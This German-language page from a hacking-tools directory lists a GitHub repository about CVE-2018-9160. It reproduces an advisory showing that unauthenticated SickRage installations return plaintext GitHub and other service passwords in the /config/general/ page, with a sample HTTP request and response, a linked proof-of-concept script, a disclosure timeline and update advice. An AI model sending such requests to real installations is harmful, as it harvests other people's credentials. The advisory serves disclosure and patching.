Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
Tools/GitHubGitHub/mechanico/sickragewtf
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

Repository anzeigen
7vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sickrage Klartext-GitHub-Anmeldedaten CVE-2018-9160


  1. Über

Exploit-Titel: SickRage Klartext-Anmeldedaten in HTTP-Antwort
Datum: 2018-04-01
Exploit-Autor: Sven Fassbender
Kontakt: https://twitter.com/mezdanak
Hersteller-Webseite: https://sickrage.github.io
Software-Link: https://github.com/SickRage/SickRage
Version: < v2018.03.09-1
CVE : CVE-2018-9160
Kategorie: Webanwendungen


  1. Hintergrundinformationen

"SickRage ist ein automatischer Video-Bibliotheks-Manager für Fernsehserien.
Es beobachtet neue Episoden Ihrer Lieblingssendungen und wenn sie veröffentlicht werden, vollbringt es seine Magie:
automatische Torrent/NZB-Suche, Herunterladen und Verarbeitung in den gewünschten Qualitäten." --Auszug von https://sickrage.github.io


  1. Beschreibung der Sicherheitslücke

SickRage gibt Klartext-Anmeldedaten für z. B. GitHub, AniDB, Kodi, Plex usw. in HTTP-Antworten zurück.
Voraussetzung ist, dass der Benutzer keinen Benutzernamen und kein Passwort für seine SickRage-Installation festgelegt hat. (nicht erzwungen, Standard)

HTTP-Anfrage:

GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

HTTP-Antwort:

HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. Proof of Concept

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. Chronologie

[2018-03-07] Sicherheitslücke entdeckt
[2018-03-08] Hersteller kontaktiert
[2018-03-08] Hersteller antwortete
[2018-03-09] Sicherheitslücke behoben. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. Empfehlung

Aktualisieren Sie die SickRage-Installation auf v2018.03.09-1 oder später.
Schützen Sie den Zugriff auf die Webanwendung mit geeigneten Benutzeranmeldedaten.


Tool herunterladen